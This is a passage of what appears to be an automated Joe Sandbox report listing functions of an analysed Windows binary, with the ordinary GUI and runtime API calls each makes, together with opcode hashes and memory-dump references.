Opcode ID: 9453e879a8d938af54c135ec3190dbe859384100ae6e3dbe6a816a42d5955a88
Instruction ID: 5fc18a57e794e146eee538696c1132e911c6bb2d3a0ddf3a4d5f06ddf545ad7b
Opcode Fuzzy Hash: 9453e879a8d938af54c135ec3190dbe859384100ae6e3dbe6a816a42d5955a88
Instruction Fuzzy Hash: 2C212332A20305AFDB33AF70CCC9DAE76A9EB80358F100939F916A71E6DB309D51C610

Function 001CE4FC Relevance: 7.6, APIs: 5, Instructions: 92windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001CE503
CreateRectRgnIndirect.GDI32(?), ref: 001CE525

Part of subcall function 001D0090: SelectClipRgn.GDI32(?,00000000), ref: 001D00B6
Part of subcall function 001D0090: SelectClipRgn.GDI32(?,?), ref: 001D00CC

GetParent.USER32(?), ref: 001CE545
MapWindowPoints.USER32(?,00000000,?,00000001), ref: 001CE59D
SendMessageW.USER32(?,00000014,?,00000000), ref: 001CE5CA

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ClipSelect$CreateH_prolog3IndirectMessageParentPointsRectSendWindow
String ID:
API String ID: 3362736716-0
Opcode ID: bb7760aa55b7d9627ec9d2b56579f9e24089a29e0e8d93535d2c2ae71993afc9
Instruction ID: 61d1c09c9882eedd3d09e11563057186f0e77da5805b93aabaf1ee566f29fb2f
Opcode Fuzzy Hash: bb7760aa55b7d9627ec9d2b56579f9e24089a29e0e8d93535d2c2ae71993afc9
Instruction Fuzzy Hash: 90310D75A0021A9FCF14DFA4D945EAEB7B5FF18300F144529F915AB251EB70DE11CBA0

Function 001FC566 Relevance: 7.6, APIs: 5, Instructions: 91windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000040D,00000000,00000000), ref: 001FC5B0
SendMessageW.USER32(?,0000040D,00000000,00000000), ref: 001FC5CC
SendMessageW.USER32(?,0000040D,00000000,00000000), ref: 001FC60F

Part of subcall function 0024C679: SendMessageW.USER32(?,00000433,00000000,?), ref: 0024C6AC

SendMessageW.USER32(?,0000040D,00000000,00000000), ref: 001FC5FA
SetRectEmpty.USER32(?), ref: 001FC62F

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: MessageSend$EmptyRect
String ID:
API String ID: 4004678023-0
Opcode ID: 679a4a853c7a7c6138d42266f2541e0147f9d722543f61639524e3ee49529e49
Instruction ID: 6333513974dabc22c6fdfd8b4675ddde264140d4c2830e9f07912c4ef7ca8740
Opcode Fuzzy Hash: 679a4a853c7a7c6138d42266f2541e0147f9d722543f61639524e3ee49529e49
Instruction Fuzzy Hash: 3F312CB1A0420DAFDB14DF68CD82EFEBBF9EB48310F110569E255E7250DA70AD419B90

Function 0020BCC8 Relevance: 7.6, APIs: 5, Instructions: 90windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001DCBFE: GetWindowLongW.USER32(?,000000F0), ref: 001DCC09

Part of subcall function 0020B291: GetParent.USER32(?), ref: 0020B29D
Part of subcall function 0020B291: GetParent.USER32(00000000), ref: 0020B2A0

SendMessageW.USER32(?,00000234,00000000,00000000), ref: 0020BD43
SendMessageW.USER32(?,00000229,00000000,00000000), ref: 0020BD6A
SendMessageW.USER32(?,00000229,00000000,00000000), ref: 0020BD87
SendMessageW.USER32(?,00000222,?,00000000), ref: 0020BD9E
SendMessageW.USER32(?,00000222,00000000,?), ref: 0020BDC3

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: MessageSend$Parent$LongWindow
String ID:
API String ID: 4191550487-0
Opcode ID: c2f562af150b25bc431fa66d480edb7f0fa559ce9beb7277094c7778a03443dc
Instruction ID: 1cbf0744190adce8258a323690bf33d3b7aac5bb6ed1511add54bb47653c6a1e
Opcode Fuzzy Hash: c2f562af150b25bc431fa66d480edb7f0fa559ce9beb7277094c7778a03443dc
Instruction Fuzzy Hash: 6B21E53173030A7BDB3A6F20CC47BBDA615EF58311F14082AF615AA1D3DBB1AC609A90

Function 0021997D Relevance: 7.6, APIs: 5, Instructions: 89windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 002199C0
SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 002199F3
GetWindowRect.USER32(?,?), ref: 00219A02
SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00219A58
RedrawWindow.USER32(?,00000000,00000000,00000185), ref: 00219A6A

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$MessageSend$RectRedrawVisible
String ID:
API String ID: 1695962874-0
Opcode ID: 375e9f31aa297e23325a66409aa5f26a2b2759403c35df6b0dbe4efe01cc5ab0
Instruction ID: 48aad15de72fd176ab4cdc1235502ea07d99ad14e947759b1fedbbc19c786c0a
Opcode Fuzzy Hash: 375e9f31aa297e23325a66409aa5f26a2b2759403c35df6b0dbe4efe01cc5ab0
Instruction Fuzzy Hash: 8B312C71500245AFCB11CFA9CD85EEFBBF9FB89710F10465AF566A72A0CB31A940CB10

Function 002129B7 Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00212A10
GetWindowRect.USER32(?,?), ref: 00212A33
PtInRect.USER32(?,?,?), ref: 00212A3F
GetWindowRect.USER32(?,?), ref: 00212A5D
PtInRect.USER32(?,?,?), ref: 00212A6A

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Window
String ID:
API String ID: 924285169-0
Opcode ID: 47f53495082b82e92ba347151f6cf5efa6e25ca81bf6ebb0a32742d0ed84f10c
Instruction ID: bada499b138a32b2826e5a78705e7f39177bd416cc30fa1441af41f164b75a55
Opcode Fuzzy Hash: 47f53495082b82e92ba347151f6cf5efa6e25ca81bf6ebb0a32742d0ed84f10c
Instruction Fuzzy Hash: 8831F57592021AEFCF11DFA9D8849EEBBF8AF5C750B10416AF405E7221D6709954CFA0

Function 001D8693 Relevance: 7.6, APIs: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 001D86B6
GetWindowRect.USER32(00000000,?), ref: 001D86E3
SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015), ref: 001D8708
GetWindow.USER32(?,00000005), ref: 001D8711
ScrollWindow.USER32(?,?,?,?,?), ref: 001D872C

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$RectScrollVisible
String ID:
API String ID: 2639402888-0
Opcode ID: 45bc905dd9b5e18468bb3ebacc1e0417b7c7d36da5c45db39b7041da9a6dbfd7
Instruction ID: 5a0097b840aef1899f257d1e7973c8db872c3fbd156afafd75cc0dc4e8008a7d
Opcode Fuzzy Hash: 45bc905dd9b5e18468bb3ebacc1e0417b7c7d36da5c45db39b7041da9a6dbfd7
Instruction Fuzzy Hash: 9F214871940208EFCF11DFA9CC89DAFBBB9FF88350F20441AF646A6251DB309A40CB61

Function 001DA6E4 Relevance: 7.6, APIs: 5, Instructions: 80windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001DA6EE
GetTopWindow.USER32(00000000), ref: 001DA713
GetDlgCtrlID.USER32(00000000), ref: 001DA725
SendMessageW.USER32(?,00000087,00000000,00000000), ref: 001DA781
GetWindow.USER32(00000000,00000002), ref: 001DA7C1

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$CtrlH_prolog3MessageSend
String ID:
API String ID: 849854284-0
Opcode ID: 11c1a2d4ea330c24c9b4ce368c16de91a8cd0375f7d8ac0cbe42a8cb1ec9b48d
Instruction ID: d9646e67946f29cbabee0275059e23d895f87d4d13804c6ccde13a01fc76da62
Opcode Fuzzy Hash: 11c1a2d4ea330c24c9b4ce368c16de91a8cd0375f7d8ac0cbe42a8cb1ec9b48d
Instruction Fuzzy Hash: 2921BF71901218ABDF25EB60DC85EFEB6B8FF65300F60815AF555E2390DB318E40CBA2

Function 00219E4F Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00219E56
SendMessageW.USER32(?,0000007F,00000000,00000000), ref: 00219E7D
SendMessageW.USER32(?,0000007F,00000001,00000000), ref: 00219E91
GetClassLongW.USER32(?,000000DE), ref: 00219F09
GetClassLongW.USER32(?,000000F2), ref: 00219F17

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ClassLongMessageSend$H_prolog3
String ID:
API String ID: 350087385-0
Opcode ID: dcbd197d7acfb5d352b85305f2ec1870c8bdf81cf99d75583e9e3dd98e9174ae
Instruction ID: ac0160abab98c57ac36ed4c28dcb512a7d6d24219103abadada8de0021bb201f
Opcode Fuzzy Hash: dcbd197d7acfb5d352b85305f2ec1870c8bdf81cf99d75583e9e3dd98e9174ae
Instruction Fuzzy Hash: BC21B331A20215ABDF21EF64CC91FEE73E8AF74750F110665F954BB1E2DA609C91CE50

Function 001C2A40 Relevance: 7.6, APIs: 5, Instructions: 76COMMON

Download Yara Rule

APIs

SetupGetStringFieldW.SETUPAPI(?,00000001,00000000,00000000,00000000), ref: 001C2A54
GetLastError.KERNEL32(?,?,001C2172,?), ref: 001C2A5E
SetupGetStringFieldW.SETUPAPI(?,00000001,?,00000000,00000000), ref: 001C2AA4
_wcsnlen.LIBCMT ref: 001C2ACB

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: FieldSetupString$ErrorLast_wcsnlen
String ID:
API String ID: 2547521842-0
Opcode ID: c0b2bfa788a00a39e89311f5a948dca815c6cb331b6a5ab3c0daa306b74979ab
Instruction ID: a8d4374cc68185a893be24b01cd89e132dd4fc4682f0b64498744c926434f29c
Opcode Fuzzy Hash: c0b2bfa788a00a39e89311f5a948dca815c6cb331b6a5ab3c0daa306b74979ab
Instruction Fuzzy Hash: 24214A71700105AFD728CFA9DC88F6AB3E9EFA8741F20056CE549D7690EB31ED408A64

Function 0021144F Relevance: 7.6, APIs: 5, Instructions: 70windowCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00211456
DestroyMenu.USER32(?,00000004,002118A4), ref: 00211492
IsWindow.USER32(?), ref: 002114A3
SendMessageW.USER32(?,00000010,00000000,00000000), ref: 002114B7
~_Task_impl.LIBCPMT ref: 00211530

Part of subcall function 0026B6DD: GetParent.USER32(?), ref: 0026B743

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: DestroyH_prolog3MenuMessageParentSendTask_implWindow
String ID:
API String ID: 1857064102-0
Opcode ID: 4ec5271008d7079d7049c6093ddd8ba95ec44b0b953be84d5bff500d86997763
Instruction ID: e987f79b6c71140c2f2ba49a815ec78082429150a680cc720fda65680652b6cc
Opcode Fuzzy Hash: 4ec5271008d7079d7049c6093ddd8ba95ec44b0b953be84d5bff500d86997763
Instruction Fuzzy Hash: 6A31D130511685DFCB21EF78C945BFEBBE0AF65304F20485CE09A57282DBB56A90DF12

Function 00206D91 Relevance: 7.6, APIs: 5, Instructions: 70windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001DCBFE: GetWindowLongW.USER32(?,000000F0), ref: 001DCC09

SendMessageW.USER32(?,00000086,00000001,00000000), ref: 00206DF8
SendMessageW.USER32(?,00000086,00000000,00000000), ref: 00206E0F
GetDesktopWindow.USER32 ref: 00206E13
SendMessageW.USER32(00000000,0000036D,0000000C,00000000), ref: 00206E34
GetWindow.USER32(00000000), ref: 00206E39

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: MessageSendWindow$DesktopLong
String ID:
API String ID: 2272707703-0
Opcode ID: 4ac6bcb87ed9dc720b4b1563151e6c96ac79c35abe335cef8ba854fb85ab544e
Instruction ID: 0cb3004efdd90840d3b583976229b9b0ca638a6d5329e7d526c46555258d2c49
Opcode Fuzzy Hash: 4ac6bcb87ed9dc720b4b1563151e6c96ac79c35abe335cef8ba854fb85ab544e
Instruction Fuzzy Hash: 3B11EF3526075277EB312E21CC8EFAB3A689F94790F240029FE455D1E3CFA2C8708690

Function 002BF91B Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 002BF929

Part of subcall function 002BE4B1: __FF_MSGBANNER.LIBCMT ref: 002BE4CA
Part of subcall function 002BE4B1: __NMSG_WRITE.LIBCMT ref: 002BE4D1
Part of subcall function 002BE4B1: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,002C4298,?,00000001,?,?,002C6FC6,00000018,00328280,0000000C,002C7056), ref: 002BE4F6

_free.LIBCMT ref: 002BF93C

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 8c0eb95ddb08acf01c312a528b0f8953a682788a1e442e71977fe1af348a37e3
Instruction ID: 1054f578ed792b96446de92882a9fe11ffe4db58256ee1a68d8d133a04580706
Opcode Fuzzy Hash: 8c0eb95ddb08acf01c312a528b0f8953a682788a1e442e71977fe1af348a37e3
Instruction Fuzzy Hash: 29118232964A16BBCF722F74BD447DD37589B543F0F229536F9599B190DF3088608B90

Function 0020759B Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON

Download Yara Rule

APIs

GlobalGetAtomNameW.KERNEL32(?,?,00000103), ref: 00207615
GlobalAddAtomW.KERNEL32(?), ref: 00207624
GlobalGetAtomNameW.KERNEL32(?,?,00000103), ref: 0020763A
GlobalAddAtomW.KERNEL32(?), ref: 00207643
SendMessageW.USER32(?,000003E4,?,?), ref: 0020766D

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: AtomGlobal$Name$MessageSend
String ID:
API String ID: 1515195355-0
Opcode ID: 8a88abe25981f63da42fbe821441e74aeecf8e4edb28141b51bd1626af00b9b5
Instruction ID: 8d31a2bb288a1daf59695097c7626d8db00be761e4bb17a8ede0f90307cb1f2c
Opcode Fuzzy Hash: 8a88abe25981f63da42fbe821441e74aeecf8e4edb28141b51bd1626af00b9b5
Instruction Fuzzy Hash: 4E216271900218AACB20DF79CC48AEAB3FCEB18744F00459AE55E97192D774AE90CF60

Function 001F2EA5 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

FillRect.USER32(?,?), ref: 001F2EDC
GetParent.USER32(?), ref: 001F2EF9
GetClientRect.USER32(?,?), ref: 001F2F08
GetParent.USER32(?), ref: 001F2F11
MapWindowPoints.USER32(?,?,?,00000002), ref: 001F2F26

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ParentRect$ClientFillPointsWindow
String ID:
API String ID: 3058756167-0
Opcode ID: eb27e720b02b5061e8b3c937fc8f8acec49dd5eae9fd5ebe43ea0ec3d814a009
Instruction ID: eab1e7e4fd2986246026fb9f18f662bb973e841f3ca898bda1a350d7f5aea56b
Opcode Fuzzy Hash: eb27e720b02b5061e8b3c937fc8f8acec49dd5eae9fd5ebe43ea0ec3d814a009
Instruction Fuzzy Hash: 15214D71900209AFCB00EFA5DC498AFBBB9FF49310B11456AF945A7221DB71AD04CF90

Function 001C7180 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 001C71B2

Part of subcall function 002D8838: _setlocale.LIBCMT ref: 002D884A

_free.LIBCMT ref: 001C71C4

Part of subcall function 002BE216: HeapFree.KERNEL32(00000000,00000000,?,002C5DB2,00000000,?,002C4298,?,00000001,?,?,002C6FC6,00000018,00328280,0000000C,002C7056), ref: 002BE22C
Part of subcall function 002BE216: GetLastError.KERNEL32(00000000,?,002C5DB2,00000000,?,002C4298,?,00000001,?,?,002C6FC6,00000018,00328280,0000000C,002C7056,?), ref: 002BE23E

_free.LIBCMT ref: 001C71D7
_free.LIBCMT ref: 001C71EA
_free.LIBCMT ref: 001C71FD

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
String ID:
API String ID: 3515823920-0
Opcode ID: 1b138b72f1a0bde290e2f3c08c71d46254b2f470239595298abece24acf37baf
Instruction ID: 6dca83454dbd49077b44fc7cd3e87d0e047e5630c5b9ce39cbb12d86a026bf67
